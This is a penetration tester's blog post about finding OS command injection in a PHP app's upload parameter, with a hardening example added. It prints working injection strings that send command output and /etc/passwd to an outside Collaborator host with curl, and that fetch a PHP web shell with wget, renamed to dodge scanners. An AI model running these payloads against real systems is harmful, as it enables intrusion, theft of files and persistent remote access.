Friday, January 7, 2022

Hacking around with os injection


During a recent pentest of an app written in PHP, Burp gave me a little surprise: an OS command injection notification! I had fun playing around with it, and it was in the oddest place. Burp had gotten an interaction with Collaborator, so it was a solid notification.

The issue was found in one of the app's upload functions, in a variable called KeyId, which I think was passed to the PHP system() call (or exec(), passthru(), etc.) for some reason. Here is the payload Burp was using to get the Collaborator interaction:

14316'"`0&nslookup -q=cname fo70trk51oioge2t1p2zzdvvdmjp7fvcj46wul.burpcollaborator.net.&`' 
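For contrast with the bug described above, here is an added example (my own illustration, not code from the tested app) of the hardened shape such an upload handler should have in PHP: the parameter is checked against a strict allowlist and then passed through escapeshellarg(), so quotes, backticks and `&` can never reach the shell as syntax. The expected KeyId format, the `process-upload` tool name and the `build_command` function are assumptions.

```php
<?php
// Added example: hardened handling of a request parameter (assumed name:
// KeyId) that ends up in a shell command. Two layers of defence:
// 1. allowlist validation, 2. escapeshellarg() so the shell sees one
// quoted word even if validation is ever loosened.

function validate_key_id(string $keyId): string
{
    // Assumption: a legitimate KeyId is a short decimal number like "14316".
    // Anything else (quotes, backticks, '&', '|', whitespace) is rejected
    // before it can reach the shell.
    if (!preg_match('/^[0-9]{1,10}$/', $keyId)) {
        throw new InvalidArgumentException('invalid KeyId');
    }
    return $keyId;
}

function build_command(string $keyId): string
{
    // "process-upload" is a hypothetical tool the upload handler invokes.
    $safe = validate_key_id($keyId);
    // Defence in depth: even a validated value is passed as a single
    // quoted argument, never concatenated raw into the command line.
    return 'process-upload --key ' . escapeshellarg($safe);
}

// The vulnerable shape the post describes, for comparison only:
//   system("process-upload --key " . $_POST['KeyId']);
// There the shell parses the `...` and & parts of the payload as
// separate commands; with the code above the request is rejected.

// Constructed inputs: a legitimate value and the shape of the payload above.
$inputs = ['14316', "14316'\"`0&id&`'"];
foreach ($inputs as $in) {
    try {
        echo build_command($in), PHP_EOL;   // process-upload --key '14316'
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

If the handler can avoid the shell entirely (for example proc_open() with an argument array, available since PHP 7.4), that is preferable to escaping.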

So for RCE I needed to use a string like:

14316'"`0&< CMD >&`' 

First I wanted to verify I had access to the system, so I thought I would use curl to exfil the results of running a command, and my first choice was id to check my privileges on the system. So I used this string:

14316'"`0&id|curl -d @- http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`' 

This confirmed I could run system commands and exfil the data, and that I was running them as a low-level user. Then I started to exfil files to look for priv esc and gather info. I also used curl for this, making POST requests to Burp Collaborator with the file data in the POST body. Here is an example string:

14316'"`0&curl -F file=@/etc/passwd http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`'

After getting a few files pulled down, I figured the next move was to try to get a web shell on the system to continue checking for priv esc. I would have preferred Metasploit, but due to the many network restrictions it wasn't an option, so I figured I would try to get the system to pull down a PHP web shell from the web. It worked like a charm. Here is the string I used to download files from the web:

14316'"`0&wget https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/9377612eeea89aed2b226a870e76ac12965d6694/easy-simple-php-webshell.php&`'

Because the web shell is a GitHub project, I changed the name of the shell right away in case automated scanners were looking for easy wins. So that is it; have fun and stay safe out there.